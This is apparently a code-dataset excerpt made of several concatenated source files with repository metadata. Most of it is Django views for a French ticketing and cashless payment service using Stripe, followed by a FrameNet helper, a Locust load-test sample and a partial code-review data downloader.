return debut_jour, lendemain_quatre_heure\n\n\n'''\n@permission_classes([permissions.IsAuthenticated])\nclass LoadCardsFromCsv(APIView):\n\n def is_string_an_url(self, url_string):\n validate_url = URLValidator()\n\n try:\n validate_url(url_string)\n except ValidationError as e:\n return False\n return True\n\n def post(self, request):\n try :\n gen = request.data['generation']\n content_csv_file = request.data['csv'].read().decode()\n file = StringIO(content_csv_file)\n csv_data = csv.reader(file, delimiter=\",\")\n except:\n return Response('Mauvais fichiers', status=status.HTTP_406_NOT_ACCEPTABLE)\n\n list_csv = []\n for line in csv_data:\n list_csv.append(line)\n\n # on saucissonne l'url d'une ligne au pif :\n part = list_csv[1][0].partition('/qr/')\n base_url = f\"{part[0]}{part[1]}\"\n\n if self.is_string_an_url(base_url) and uuid.UUID(part[2]) :\n detail_carte, created = Detail.objects.get_or_create(\n base_url=base_url,\n origine=connection.tenant,\n generation=int(gen),\n )\n\n numline = 1\n for line in list_csv:\n print(numline)\n part = line[0].partition('/qr/')\n try:\n uuid_url = uuid.UUID(part[2])\n print(f\"base_url : {base_url}\")\n print(f\"uuid_url : {uuid_url}\")\n print(f\"number : {line[1]}\")\n print(f\"tag_id : {line[2]}\")\n\n # if str(uuid_url).partition('-')[0].upper() != line[1]:\n # print('ERROR PRINT != uuid')\n # break\n\n carte, created = CarteCashless.objects.get_or_create(\n tag_id=line[2],\n uuid=uuid_url,\n number=line[1],\n detail=detail_carte,\n )\n\n numline += 1\n except:\n pass\n\n return Response('Cartes chargées', status=status.HTTP_200_OK)\n\n return Response('Mauvais formatage de fichier.', status=status.HTTP_406_NOT_ACCEPTABLE)\n # import ipdb; ipdb.set_trace()\n'''\n\n\n@permission_classes([permissions.IsAuthenticated])\nclass CancelSubscription(APIView):\n def post(self, request):\n user = request.user\n price = request.data.get('uuid_price')\n\n membership = Membership.objects.get(\n user=user,\n price=price\n )\n\n if membership.status == Membership.AUTO:\n stripe.api_key = Configuration.get_solo().get_stripe_api()\n stripe.Subscription.delete(\n membership.stripe_id_subscription,\n # stripe_account=config.get_stripe_connect_account(),\n )\n membership.status = Membership.CANCELED\n membership.save()\n\n # TODO: envoyer un mail de confirmation d'annulation\n return Response('Renouvellement automatique supprimé.', status=status.HTTP_200_OK)\n\n return Response('Pas de renouvellement automatique sur cette adhésion.', status=status.HTTP_406_NOT_ACCEPTABLE)\n\n\n@permission_classes([TenantAdminPermission])\nclass Gauge(APIView):\n\n # API pour avoir l'état de la jauge (GAUGE in inglishe) et des billets scannés.\n def get(self, request):\n config = Configuration.get_solo()\n debut_jour, lendemain_quatre_heure = borne_temps_4h()\n queryset = Ticket.objects.filter(\n reservation__event__datetime__gte=debut_jour,\n reservation__event__datetime__lte=lendemain_quatre_heure,\n status__in=[Ticket.NOT_SCANNED, Ticket.SCANNED]\n )\n\n data = {\n \"gauge_max\": config.jauge_max,\n \"all_tickets\": queryset.count(),\n \"scanned_tickets\": queryset.filter(status=Ticket.SCANNED).count()\n }\n\n return Response(data, status=status.HTTP_200_OK)\n\n\nclass TicketViewset(viewsets.ViewSet):\n def list(self, request):\n debut_jour, lendemain_quatre_heure = borne_temps_4h()\n\n queryset = Ticket.objects.filter(\n reservation__event__datetime__gte=debut_jour,\n reservation__event__datetime__lte=lendemain_quatre_heure,\n status__in=[\"K\", \"S\"]\n )\n\n serializer = 
TicketSerializer(queryset, many=True, context={'request': request})\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Ticket.objects.all()\n ticket = get_object_or_404(queryset, pk=pk)\n serializer = TicketSerializer(ticket)\n return Response(serializer.data)\n\n def get_permissions(self):\n return get_permission_Api_LR_Admin(self)\n\n\ndef maj_membership_from_cashless(user: TibilletUser, data: dict):\n '''\n On met à jour la carte de membre si le cashless à des données plus récentes.\n\n '''\n logger.info('maj_membership_from_cashless')\n try:\n # Il n'y est sensé y avoir qu'un seul objet produit qui puisse être envoyé au cashless\n produit_adhesion = Product.objects.get(send_to_cashless=True)\n\n # On va chercher la carte membership\n deadline_billetterie = None\n membership = Membership.objects.filter(\n user=user,\n price__product=produit_adhesion\n ).first()\n\n if membership:\n deadline_billetterie = membership.deadline()\n else:\n prices_adhesion = produit_adhesion.prices.all()\n price: Price = prices_adhesion.get(prix=float(data.get('cotisation')))\n logger.info(f'Pas de membreship, on la crée avec la data du cashless :')\n logger.info(f'{data}')\n membership = Membership.objects.create(\n user=user,\n first_name=data.get('prenom'),\n last_name=data.get('name'),\n newsletter=bool(data.get('demarchage')),\n price=price\n )\n\n date_inscription = data.get('date_inscription')\n if date_inscription:\n deadline_cashless = datetime.strptime(data.get('prochaine_echeance'), '%Y-%m-%d').date()\n if deadline_billetterie:\n if deadline_billetterie >= deadline_cashless:\n logger.info('Adhésion associative syncho avec le cashless.')\n return membership\n\n logger.info(f'Adhésion associative {produit_adhesion} non syncho avec le cashless. 
On mets à jour.')\n\n membership.date_added = dateutil.parser.parse(data.get('date_ajout'))\n membership.first_contribution = datetime.strptime(data.get('date_inscription'), '%Y-%m-%d').date()\n membership.last_contribution = datetime.strptime(data.get('date_derniere_cotisation'), '%Y-%m-%d').date()\n membership.contribution_value = float(data.get('cotisation'))\n membership.save()\n\n return membership\n\n except Exception as e:\n logger.error(f'maj_membership_from_cashless ERROR : {e}')\n return None\n\n\ndef request_for_data_cashless(user: TibilletUser):\n if user.email_error or not user.email:\n return {'erreur': f\"user.email_error {user.email_error}\"}\n\n configuration = Configuration.get_solo()\n if configuration.server_cashless and configuration.key_cashless:\n try:\n verify = True\n if settings.DEBUG:\n verify = False\n\n response = requests.request(\"POST\",\n f\"{configuration.server_cashless}/api/membre_check\",\n headers={\"Authorization\": f\"Api-Key {configuration.key_cashless}\"},\n data={\"email\": user.email},\n verify=verify)\n\n if response.status_code != 200:\n return {'erreur': f\"{response.status_code} : {response.text}\"}\n\n data = json.loads(response.content)\n if data.get('a_jour_cotisation'):\n membership = maj_membership_from_cashless(user, data)\n return data\n\n except Exception as e:\n return {'erreur': f\"{e}\"}\n\n return {'erreur': f\"pas de configuration server_cashless\"}\n\n\nclass MembershipViewset(viewsets.ViewSet):\n\n def create(self, request):\n logger.info(f\"MembershipViewset reçue -> go MembreValidator\")\n\n # Test pour option :\n # request.data['options'] = ['1ff89201-edfa-4839-80d8-a5f98737f970',]\n\n # TODO: Pourquoi deux serializers ?\n membre_validator = MembreValidator(data=request.data, context={'request': request})\n if membre_validator.is_valid():\n adhesion_validator = NewAdhesionValidator(data=request.data, context={'request': request})\n if adhesion_validator.is_valid():\n return Response(adhesion_validator.data, status=status.HTTP_201_CREATED)\n\n logger.error(f'adhesion_validator.errors : {adhesion_validator.errors}')\n return Response(adhesion_validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n logger.error(f'membre_validator.errors : {membre_validator.errors}')\n return Response(membre_validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n def get_permissions(self):\n if self.action in ['create', 'retrieve']:\n permission_classes = [permissions.AllowAny]\n else:\n permission_classes = [TenantAdminPermission]\n\n return [permission() for permission in permission_classes]\n\n\n\nclass ZReportPDF(View):\n def get(self, request, pk_uuid):\n logger.info(f\"ZReportPDF user : {request.user}\")\n if not TenantAdminPermissionWithRequest(request):\n return HttpResponse(f\"403\", content_type='application/json')\n\n configuration = Configuration.get_solo()\n if configuration.server_cashless and configuration.key_cashless:\n try:\n response = requests.request(\"GET\",\n f\"{configuration.server_cashless}/rapport/TicketZapi/{pk_uuid}\",\n headers={\"Authorization\": f\"Api-Key {configuration.key_cashless}\"},\n verify=bool(not settings.DEBUG), )\n\n if response.status_code == 200:\n data = json.loads(response.content)\n\n date = data['start_date']\n structure = data['structure']\n # import ipdb; ipdb.set_trace()\n\n logger.info(f\"ZReportPDF data : {data}\")\n logger.info(f\" On envoie le mail\")\n report_celery_mailer.delay([data, ])\n\n pdf_binary = report_to_pdf(data)\n response = HttpResponse(pdf_binary, 
content_type='application/pdf')\n response['Content-Disposition'] = f'attachment; filename=\"{structure}-TicketZ-{date}.pdf\"'\n return response\n\n # return HttpResponse(json.dumps(data), content_type='application/json')\n # return Response(data, status=status.HTTP_200_OK)\n\n except Exception as e:\n logger.info(f\"ZReportPDF erreur {e}\")\n raise e\n\n logger.info(f\"ZReportPDF erreur {response.status_code} : {response.text}\")\n return HttpResponse(f\"{response.status_code}\", content_type='application/json')\n\n # return {'erreur': f\"pas de configuration server_cashless\"}\n\n\nclass TicketPdf(APIView):\n permission_classes = [AllowAny]\n\n def get(self, request, pk_uuid):\n ticket = get_object_or_404(Ticket, uuid=pk_uuid)\n\n VALID_TICKET_FOR_PDF = [Ticket.NOT_SCANNED, Ticket.SCANNED]\n if ticket.status not in VALID_TICKET_FOR_PDF:\n return Response('Ticket non valide', status=status.HTTP_403_FORBIDDEN)\n\n pdf_binary = create_ticket_pdf(ticket)\n response = HttpResponse(pdf_binary, content_type='application/pdf')\n response['Content-Disposition'] = f'attachment; filename=\"{ticket.pdf_filename()}\"'\n return response\n\n\n\n\n# On vérifie que les métatada soient les meme dans la DB et chez Stripe.\ndef metatadata_valid(paiement_stripe_db: Paiement_stripe, checkout_session):\n metadata_stripe_json = checkout_session.metadata\n metadata_stripe = json.loads(str(metadata_stripe_json))\n\n metadata_db_json = paiement_stripe_db.metadata_stripe\n metadata_db = json.loads(metadata_db_json)\n\n try:\n assert metadata_stripe == metadata_db\n assert set(metadata_db.keys()) == set(metadata_stripe.keys())\n for key in set(metadata_stripe.keys()):\n assert metadata_db[key] == metadata_stripe[key]\n return True\n except:\n logger.error(f\"{timezone.now()} \"\n f\"retour_stripe {paiement_stripe_db.uuid} : \"\n f\"metadata ne correspondent pas : {metadata_stripe} {metadata_db}\")\n return False\n\n\ndef paiment_stripe_validator(request, paiement_stripe):\n if paiement_stripe.traitement_en_cours:\n\n data = {\n \"msg\": 'Paiement validé. Création des billets et envoi par mail en cours.',\n }\n\n if paiement_stripe.reservation:\n serializer = TicketSerializer(paiement_stripe.reservation.tickets.all().exclude(status=Ticket.SCANNED),\n many=True)\n data[\"tickets\"] = serializer.data\n\n # Si ce n'est pas une adhésion par QRCode,\n # on renvoie vers le front en annonçant que le travail est en cours\n if paiement_stripe.source != Paiement_stripe.QRCODE:\n return Response(\n data,\n status=status.HTTP_226_IM_USED\n )\n\n if paiement_stripe.reservation:\n if paiement_stripe.reservation.status == Reservation.PAID_ERROR:\n return Response(\n _(\"Erreur dans l'envoi du mail. Merci de vérifier l'adresse\"),\n status=status.HTTP_412_PRECONDITION_FAILED\n )\n\n if paiement_stripe.status == Paiement_stripe.VALID or paiement_stripe.reservation.status == Reservation.VALID:\n serializer = TicketSerializer(paiement_stripe.reservation.tickets.filter(status=Ticket.NOT_SCANNED),\n many=True, context=request)\n\n data = {\n \"msg\": 'Paiement validé. 
Billets envoyés par mail.',\n \"tickets\": serializer.data,\n }\n\n return Response(\n data,\n status=status.HTTP_208_ALREADY_REPORTED\n )\n\n # configuration = Configuration.get_solo()\n # stripe.api_key = RootConfiguration.get_solo().get_stripe_api()\n stripe.api_key = Configuration.get_solo().get_stripe_api()\n\n # SI c'est une source depuis INVOICE,\n # L'object vient d'être créé, on vérifie que la facture stripe\n # est payée et on met en VALID.\n if paiement_stripe.source == Paiement_stripe.INVOICE:\n paiement_stripe.traitement_en_cours = True\n invoice = stripe.Invoice.retrieve(paiement_stripe.invoice_stripe)\n\n if invoice.status == 'paid':\n paiement_stripe.status = Paiement_stripe.PAID\n paiement_stripe.last_action = timezone.now()\n paiement_stripe.traitement_en_cours = True\n paiement_stripe.save()\n\n return Response(\n 'invoice ok',\n status=status.HTTP_202_ACCEPTED\n )\n\n else:\n return Response(\n _(f'stripe invoice : {invoice.status} - paiement : {paiement_stripe.status}'),\n status=status.HTTP_402_PAYMENT_REQUIRED\n )\n\n # Sinon c'est un paiement stripe checkout\n elif paiement_stripe.status != Paiement_stripe.VALID:\n config = Configuration.get_solo()\n checkout_session = stripe.checkout.Session.retrieve(\n paiement_stripe.checkout_session_id_stripe,\n # stripe_account=config.get_stripe_connect_account()\n )\n\n paiement_stripe.customer_stripe = checkout_session.customer\n\n # Vérifie que les metatada soient cohérentes. #NTUI !\n if metatadata_valid(paiement_stripe, checkout_session):\n if checkout_session.payment_status == \"unpaid\":\n paiement_stripe.status = Paiement_stripe.PENDING\n if datetime.now().timestamp() > checkout_session.expires_at:\n paiement_stripe.status = Paiement_stripe.EXPIRE\n\n paiement_stripe.save()\n\n if paiement_stripe.source != Paiement_stripe.QRCODE:\n return Response(\n _(f'stripe : {checkout_session.payment_status} - paiement : {paiement_stripe.status}'),\n status=status.HTTP_402_PAYMENT_REQUIRED\n )\n\n elif checkout_session.payment_status == \"paid\":\n\n # le .save() lance le process pre_save BaseBillet.models.send_to_cashless\n # qui modifie le status de chaque ligne\n # et envoie les informations au serveur cashless.\n # si validé par le serveur cashless, alors la ligne sera VALID.\n # Si toute les lignes sont VALID, le paiement_stripe sera aussi VALID\n # grace au post_save BaseBillet.models.check_status_stripe\n\n paiement_stripe.status = Paiement_stripe.PAID\n paiement_stripe.last_action = timezone.now()\n paiement_stripe.traitement_en_cours = True\n\n # Dans le cas d'un nouvel abonnement\n # On va chercher le numéro de l'abonnement stripe\n # Et sa facture\n if checkout_session.mode == 'subscription':\n if bool(checkout_session.subscription):\n paiement_stripe.subscription = checkout_session.subscription\n subscription = stripe.Subscription.retrieve(\n checkout_session.subscription,\n # stripe_account=config.get_stripe_connect_account()\n )\n paiement_stripe.invoice_stripe = subscription.latest_invoice\n\n paiement_stripe.save()\n logger.info(\"*\" * 30)\n logger.info(\n f\"{datetime.now()} - paiment_stripe_validator - checkout_session.payment_status : {checkout_session.payment_status}\")\n logger.info(\n f\"{datetime.now()} - paiment_stripe_validator - paiement_stripe.save() {paiement_stripe.status}\")\n logger.info(\"*\" * 30)\n\n else:\n paiement_stripe.status = Paiement_stripe.CANCELED\n paiement_stripe.save()\n else:\n return Response(_(f'Erreur Meta'), status=status.HTTP_406_NOT_ACCEPTABLE)\n\n # on vérifie le changement de 
status\n paiement_stripe.refresh_from_db()\n\n # Paiement depuis QRCode carte\n # on envoie au serveur cashless\n if paiement_stripe.source == Paiement_stripe.QRCODE:\n # Si le paiement est valide, c'est que les presave et postsave\n # ont validé la réponse du serveur cashless pour les recharges\n if paiement_stripe.status == Paiement_stripe.VALID:\n lignes_articles = paiement_stripe.lignearticle_set.all()\n # on boucle ici pour récuperer l'uuid de la carte.\n for ligne_article in lignes_articles:\n carte = ligne_article.carte\n if carte:\n if request.method == 'GET':\n # On re-boucle pour récuperer les noms des articles vendus afin de les afficher sur le front\n for ligneArticle in lignes_articles:\n messages.success(request,\n f\"{ligneArticle.pricesold.price.product.name} : {ligneArticle.pricesold.price.name}\")\n\n messages.success(request, f\"Paiement validé. Merci !\")\n\n return HttpResponseRedirect(f\"/qr/{carte.uuid}#success\")\n else:\n return Response(f'VALID', status=status.HTTP_200_OK)\n\n elif paiement_stripe.status == Paiement_stripe.PAID:\n for ligne_article in paiement_stripe.lignearticle_set.all():\n if ligne_article.carte:\n messages.error(request,\n f\"Le paiement à bien été validé \"\n f\"mais un problème est apparu avec votre carte cashless. \"\n f\"Merci de contacter un responsable.\")\n return HttpResponseRedirect(f\"/qr/{ligne_article.carte.uuid}#erreurpaiement\")\n\n else:\n # on boucle ici pour récuperer l'uuid de la carte.\n for ligne_article in paiement_stripe.lignearticle_set.all():\n if ligne_article.carte:\n messages.error(request,\n f\"Un problème de validation de paiement a été detecté. \"\n f\"Merci de vérifier votre moyen de paiement et/ou contactez un responsable.\")\n return HttpResponseRedirect(f\"/qr/{ligne_article.carte.uuid}#erreurpaiement\")\n\n\n\n # Derniere action : on crée et envoie les billets si besoin\n elif paiement_stripe.source == Paiement_stripe.API_BILLETTERIE:\n if paiement_stripe.reservation:\n if paiement_stripe.reservation.status == Reservation.VALID:\n serializer = TicketSerializer(paiement_stripe.reservation.tickets.filter(status=Ticket.NOT_SCANNED),\n many=True, context=request)\n # import ipdb; ipdb.set_trace()\n data = {\n \"msg\": 'Paiement validé. Billets envoyés par mail.',\n \"tickets\": serializer.data,\n }\n return Response(\n data,\n status=status.HTTP_208_ALREADY_REPORTED\n )\n if paiement_stripe.status == Paiement_stripe.VALID:\n return Response(\n _('Paiement validé.'),\n status=status.HTTP_208_ALREADY_REPORTED\n )\n\n elif paiement_stripe.status == Paiement_stripe.PAID:\n logger.info(f\"Paiement_stripe.API_BILLETTERIE : {paiement_stripe.status}\")\n data = {\n \"msg\": 'Paiement validé. 
Création des billets et envoi par mail en cours.',\n }\n if paiement_stripe.reservation:\n serializer = TicketSerializer(paiement_stripe.reservation.tickets.all().exclude(status=Ticket.SCANNED),\n many=True)\n data['tickets'] = serializer.data\n return Response(\n data,\n status=status.HTTP_202_ACCEPTED\n )\n\n raise Http404(f'{paiement_stripe.status}')\n\n\n# Si on a l'uuid, on considère qu'on a la carte.\n# A réfléchir sur la suite en terme de vie privée ; AllowAny ?\n@permission_classes([permissions.AllowAny])\nclass GetFederatedAssetFromCashless(APIView):\n def get(self, request, pk_uuid):\n\n # on informe de la quantité de l'asset fédéré sur la carte.\n card = get_object_or_404(CarteCashless, uuid=pk_uuid)\n data = {\"stripe_wallet\": 0}\n try:\n wallet_stripe = card.wallet_set.get(asset__categorie=Asset.STRIPE_FED)\n data['stripe_wallet'] = wallet_stripe.qty\n return Response(data, status=status.HTTP_200_OK)\n except Exception as e:\n logger.error(f\"GetFederatedAssetFromCashless : {e}\")\n return Response(data, status=status.HTTP_404_NOT_FOUND)\n\n\n@permission_classes([permissions.AllowAny])\nclass UpdateFederatedAssetFromCashless(APIView):\n def post(self, request):\n \"\"\"\n Reception d'une demande d'update d'un portefeuille fédéré d'une carte cashless depuis un serveur cashless.\n On vérifie vers le serveur cashless ou vient la requete que la valeur est bonne (NTUI!)\n Ce qui nous permet de mettre ce point d'API en allowAny, de toute façon, on va vérifier !\n\n On met à jour la valeur en base de donnée sur la billetterie.\n Ensuite, on met à jour dans tous les serveurs cashless fédéré\n \"\"\"\n\n validator = UpdateFederatedAssetFromCashlessValidator(data=request.data)\n if not validator.is_valid():\n logger.error(\n f\"UpdateFederatedAssetFromCashless ERREUR validator.errors : {validator.errors} : request.data {request.data}\")\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n validated_data = validator.data\n wallet_stripe: Wallet = validated_data['wallet_stripe']\n carte: CarteCashless = validated_data['card']\n\n old_qty = validated_data['old_qty']\n new_qty = validated_data['new_qty']\n domain = validated_data['domain']\n uuid_log = validated_data['uuid_commande']\n\n # On log l'action\n logger.info(f\"UpdateFederatedAssetFromCashless validated_data : {validated_data}\")\n syncLog: SyncFederatedLog = validated_data['syncLog']\n\n # Une nouvelle vente a été faites sur un cashless avec la monnaie fédérée.\n # On va vérifier coté cashless si la valeur reçue est bonne (NTUI!)\n if wallet_stripe.qty == old_qty and wallet_stripe.qty != new_qty:\n logger.info(f\"UpdateFederatedAssetFromCashless NEED MAJ : {carte} - {wallet_stripe.qty} == {old_qty}\")\n\n # On utilise la class qui va vérifier si tout existe et qui récupère les assets dans le serveur cashless\n validated_wallet = WalletValidator(uuid=carte.uuid)\n dict_carte_from_cashless = validated_wallet.carte_serveur_cashless\n\n new_qty_verified = None\n for asset in dict_carte_from_cashless.get('assets'):\n if asset['categorie_mp'] == 'SF':\n new_qty_verified = Decimal(asset['qty'])\n\n # La valeur reçue par l'api allowAny correspond\n # à la valeur du serveur cashless\n # vérifié grâce à une API avec clé d'authentification\n if new_qty_verified == new_qty:\n\n wallet_stripe.qty = new_qty\n wallet_stripe.save()\n # TODO: logger\n logger.info(\n f\"UpdateFederatedAssetFromCashless MAJ : {carte} - {wallet_stripe.qty} == {new_qty} - {domain}\")\n return Response(f\"log {syncLog.uuid}\", 
status=status.HTTP_202_ACCEPTED)\n\n # La valeur reçue est différente de celle du serveur cashless\n # NTUI ???\n else:\n logger.error(f\"UpdateFederatedAssetFromCashless ERREUR : {carte} - {new_qty_verified} != {new_qty}\")\n return Response(\n f\"UpdateFederatedAssetFromCashless ERROR new_qty_verified : {carte} - wallet {wallet_stripe.qty}, old {old_qty}, new {new_qty}, new_verified {new_qty_verified}\",\n status=status.HTTP_406_NOT_ACCEPTABLE)\n\n\n # Pas besoin de mise à jour.\n elif wallet_stripe.qty == new_qty:\n logger.info(f\"UpdateFederatedAssetFromCashless NO MAJ : {carte} - {wallet_stripe.qty} == {new_qty}\")\n tenant_uuid = str(connection.tenant.uuid)\n syncLog.etat_client_sync[tenant_uuid]['return'] = True\n syncLog.etat_client_sync[tenant_uuid]['return_value'] = f\"{new_qty}\"\n syncLog.save()\n return Response(f\"NO NEED TO UPDATE - log {syncLog.uuid} already reported\",\n status=status.HTTP_208_ALREADY_REPORTED)\n\n # La valeur old est différente de celle du serveur cashless\n erreur = f\"UpdateFederatedAssetFromCashless ERROR : \" \\\n f\"log {syncLog.uuid} - carte {carte} - \" \\\n f\"billetterie wallet {wallet_stripe.qty} != cashless old {old_qty} ou new {new_qty}\"\n syncLog.etat_client_sync = erreur\n syncLog.save()\n\n logger.error(erreur)\n\n return Response(erreur, status=status.HTTP_409_CONFLICT)\n\n\ndef info_connected_account_stripe(id_acc_connect):\n stripe.api_key = RootConfiguration.get_solo().get_stripe_api()\n info_stripe = stripe.Account.retrieve(id_acc_connect)\n return info_stripe\n\n\ndef create_account_link_for_onboard(id_acc_connect=False):\n rootConf = RootConfiguration.get_solo()\n stripe.api_key = rootConf.get_stripe_api()\n\n meta = Client.objects.filter(categorie=Client.META)[0]\n meta_url = meta.get_primary_domain().domain\n\n if not id_acc_connect:\n acc_connect = stripe.Account.create(\n type=\"standard\",\n country=\"FR\",\n )\n id_acc_connect = acc_connect.get('id')\n\n account_link = stripe.AccountLink.create(\n account=id_acc_connect,\n refresh_url=f\"https://{meta_url}/api/onboard_stripe_return/{id_acc_connect}\",\n return_url=f\"https://{meta_url}/api/onboard_stripe_return/{id_acc_connect}\",\n type=\"account_onboarding\",\n )\n\n url_onboard = account_link.get('url')\n return url_onboard\n\n\n@permission_classes([permissions.AllowAny])\nclass Onboard_stripe_return(APIView):\n def get(self, request, id_acc_connect):\n details_submitted = info_connected_account_stripe(id_acc_connect).details_submitted\n if details_submitted:\n logger.info(f\"details_submitted : {details_submitted}\")\n return HttpResponseRedirect(f\"/onboardreturn/{id_acc_connect}/\")\n else:\n return Response(f\"{create_account_link_for_onboard()}\", status=status.HTTP_206_PARTIAL_CONTENT)\n\n\n@permission_classes([permissions.AllowAny])\nclass Onboard(APIView):\n def get(self, request):\n return Response(f\"{create_account_link_for_onboard()}\", status=status.HTTP_202_ACCEPTED)\n\n\n@permission_classes([permissions.AllowAny])\nclass Webhook_stripe(APIView):\n\n def post(self, request):\n payload = request.data\n logger.info(f\" \")\n # logger.info(f\"Webhook_stripe --> {payload}\")\n logger.info(f\"Webhook_stripe --> {payload.get('type')} - id : {payload.get('id')}\")\n logger.info(f\" \")\n\n # c'est une requete depuis les webhook\n # configuré dans l'admin stripe\n if payload.get('type') == \"checkout.session.completed\":\n # logger.debug(f\"Webhook_stripe checkout.session.completed : {payload}\")\n\n tenant_uuid_in_metadata = 
payload[\"data\"][\"object\"][\"metadata\"].get(\"tenant\")\n if not tenant_uuid_in_metadata:\n logger.warning(\n f\"Webhook_stripe checkout.session.completed - id : {payload.get('id')} - no tenant in metadata\")\n return Response(\"no tenant in metadata\",\n status=status.HTTP_204_NO_CONTENT)\n\n # On utilise les metadata du paiement stripe pour savoir de quel tenant cela vient.\n if f\"{connection.tenant.uuid}\" != tenant_uuid_in_metadata:\n tenant = get_object_or_404(Client, uuid=tenant_uuid_in_metadata)\n with tenant_context(tenant):\n paiement_stripe = get_object_or_404(Paiement_stripe,\n checkout_session_id_stripe=payload['data']['object']['id'])\n return paiment_stripe_validator(request, paiement_stripe)\n\n paiement_stripe = get_object_or_404(\n Paiement_stripe,\n checkout_session_id_stripe=payload['data']['object']['id']\n )\n return paiment_stripe_validator(request, paiement_stripe)\n\n\n # Prélèvement automatique d'un abonnement :\n # elif payload.get('type') == \"customer.subscription.updated\":\n # # on récupère le don dans le paiement récurent si besoin\n # logger.info(f\"Webhook_stripe customer.subscription.updated : {payload['data']['object']['id']}\")\n # logger.info(f\"\")\n # logger.info(f\"\")\n # logger.info(f\"{payload}\")\n # logger.info(f\"\")\n # logger.info(f\"\")\n\n elif payload.get('type') == \"invoice.paid\":\n # logger.info(f\" \")\n # logger.info(payload)\n # logger.info(f\" \")\n\n logger.info(f\"Webhook_stripe invoice.paid : {payload}\")\n payload_object = payload['data']['object']\n billing_reason = payload_object.get('billing_reason')\n\n # C'est un renouvellement d'abonnement\n if billing_reason == 'subscription_cycle' \\\n and payload_object.get('paid'):\n\n product_sold_stripe_id = None\n for line in payload_object['lines']['data']:\n product_sold_stripe_id = line['price']['product']\n break\n\n # On va chercher le tenant de l'abonnement grâce à l'id du product stripe\n # dans la requete POST\n with schema_context('public'):\n try:\n product_from_public_tenant = ProductDirectory.objects.get(\n product_sold_stripe_id=product_sold_stripe_id,\n )\n place = product_from_public_tenant.place\n except ProductDirectory.DoesNotExist:\n logger.error(\n f\"Webhook_stripe invoice.paid DoesNotExist : product_sold_stripe_id {product_sold_stripe_id}, serveur de test ?\")\n return Response('ProductDirectory DoesNotExist, serveur de test ?',\n status=status.HTTP_204_NO_CONTENT)\n\n # On a le tenant ( place ), on va chercher l'abonnement\n with tenant_context(place):\n invoice = payload_object['id']\n try:\n membership = Membership.objects.get(\n stripe_id_subscription=payload_object['subscription']\n )\n last_stripe_invoice = membership.last_stripe_invoice\n\n # Même adhésion, mais facture différente :\n # C'est alors un renouvellement automatique.\n if invoice != last_stripe_invoice:\n logger.info((f' nouvelle facture arrivée : {invoice}'))\n paiement_stripe = new_entry_from_stripe_invoice(membership.user, invoice)\n\n return paiment_stripe_validator(request, paiement_stripe)\n\n else:\n logger.info((f' facture déja créée et comptabilisée : {invoice}'))\n\n except Membership.DoesNotExist:\n logger.info((f' Nouvelle adhésion, facture pas encore comptabilisée : {invoice}'))\n except Exception:\n logger.error((f' erreur dans Webhook_stripe customer.subscription.updated : {Exception}'))\n raise Exception\n\n # c'est une requete depuis vue.js.\n post_from_front_vue_js = payload.get('uuid')\n if post_from_front_vue_js:\n logger.info(f\"Webhook_stripe post_from_front_vue_js 
: {payload}\")\n paiement_stripe = get_object_or_404(Paiement_stripe,\n uuid=post_from_front_vue_js)\n return paiment_stripe_validator(request, paiement_stripe)\n\n # Réponse pour l'api stripe qui envoie des webhook pour tout autre que la validation de paiement.\n # Si on renvoie une erreur, ils suppriment le webhook de leur côté.\n return Response('Pouple', status=status.HTTP_207_MULTI_STATUS)\n\n def get(self, request, uuid_paiement):\n logger.info(\"*\" * 30)\n logger.info(f\"{datetime.now()} - Webhook_stripe GET : {uuid_paiement}\")\n logger.info(\"*\" * 30)\n\n paiement_stripe = get_object_or_404(Paiement_stripe,\n uuid=uuid_paiement)\n return paiment_stripe_validator(request, paiement_stripe)\n","repo_name":"TiBillet/TiBillet","sub_path":"DjangoFiles/ApiBillet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":60531,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"86"} +{"seq_id":"13202430839","text":"#! /usr/bin/python\n\n# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\n__author__ = \"slouvan\"\n__date__ = \"$Oct 20, 2015 12:56:06 AM$\"\n\nfrom pprint import pprint\nfrom nltk.corpus import framenet as fn\nimport sys\n\ndef getFrame(lex):\n \n frameList = []\n frames = fn.frames_by_lemma(lex)\n for frame in frames:\n frameList.append(frame.name)\n return frameList\n\ndef getAllFrames():\n fNames = []\n for frame in fn.frames():\n #print frame.name +\"\\t\"+str(frame.ID)\n fNames.append(frame.name)\n return fNames\n\ndef getNbFrame():\n return len(fn.frames())\n\nif __name__ == \"__main__\":\n getFrame('burn.v')\n\n","repo_name":"StonyBrookNLP/SRL-Integrated","sub_path":"src/pymodule.py","file_name":"pymodule.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"20255201899","text":"# -*- coding:utf-8 -*-\n\"\"\"\n@Author:tang\n@File:locust_newtest.py\n@Time:2022/5/27 14:03\n说明:根据虫师视频讲解,编写样例,已进行了更新,HttpLocust不用,使用locust.HttpUser\n\"\"\"\nimport locust\nfrom locust import TaskSet, task\n\n\n# 定义用户行为\nclass UserBehavior(TaskSet):\n\n @task\n def baidu_page(self):\n self.client.get('/')\n\n\nclass WebsiteUser(locust.HttpUser):\n task_set = UserBehavior\n min_wait = 3000\n max_wait = 6000\n","repo_name":"tzk1986/UItest","sub_path":"testcase/locust_newtest.py","file_name":"locust_newtest.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70436125083","text":"import wget\nimport os\n\nclass ReviewData:\n def __init__(self, input, golden, patch, msg):\n self.input : CodeData = input\n self.golden : CodeData = golden\n self.patch : str = patch\n self.msg : str = msg\n \n def download(self, root = '.'):\n self.input.download(root+'/input')\n self.golden.download(root+'/golden')\n patch_path = f'{root}/patch'\n with open(patch_path, 'w') as f:\n f.write(self.patch)\n f.close()\n msg_path = f'{root}/msg'\n with open(msg_path, 'w') as f:\n f.write(self.msg)\n f.close()\n \nclass CodeData:\n def __init__(self, link, path2file, sha):\n # path2file : tensorflow/lite/tools/benchmark/benchmark_performance_options.cc\n self.link = link\n self.raw_code = ''\n self.path = '/'.join(path2file.split('/')[:-1])\n self.sha 